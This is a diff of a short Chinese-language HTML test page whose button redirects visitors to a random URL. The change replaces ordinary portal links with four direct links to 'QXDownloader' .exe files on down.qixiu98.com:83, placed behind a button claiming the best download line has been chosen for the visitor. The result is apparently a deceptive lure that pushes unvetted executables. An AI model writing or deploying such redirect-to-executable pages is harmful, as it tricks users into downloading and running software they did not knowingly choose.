--- a/ceshi.html
+++ b/ceshi.html
@@ -1,3 +1,4 @@
+
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
@@ -5,10 +6,10 @@
 <script>
 function a(){
 var arr=["http://www.baidu.com",
- "http://www.sina.com.cn",
- "http://www.csdn.net", 
- "http://www.163.com", 
- "http://www.126.com",
+ "http://down.qixiu98.com:83/QXDownloader_1997_71618.exe",
+ "http://down.qixiu98.com:83/QXDownloader_1997_71751.exe", 
+ "http://down.qixiu98.com:83/QXDownloader_1997_71618.exe",
+ "http://down.qixiu98.com:83/QXDownloader_1997_71751.exe", 
 ];
 var n=parseInt(Math.random()*5);
 window.location.href=arr[n];
@@ -16,8 +17,8 @@ window.location.href=arr[n];
 </script>
 </head>
 <body><br><br><br><br>
-<center><input type=button value="<b>已经为你选择最佳线路  <点这里下载> </b> " onclick=a()></center>
+<center><input type=button value="已经为你选择最佳线路  <点这里下载>  " onclick=a()></center>
 <br>
-<a href="http://qianbao.baidu.com/hd/dream?qianbao" target="_blank"><img src="http://gongyi.baidu.com/gongyi/ad2.jpg" width="891" height="239"></a>
+
 </body>
 </html>
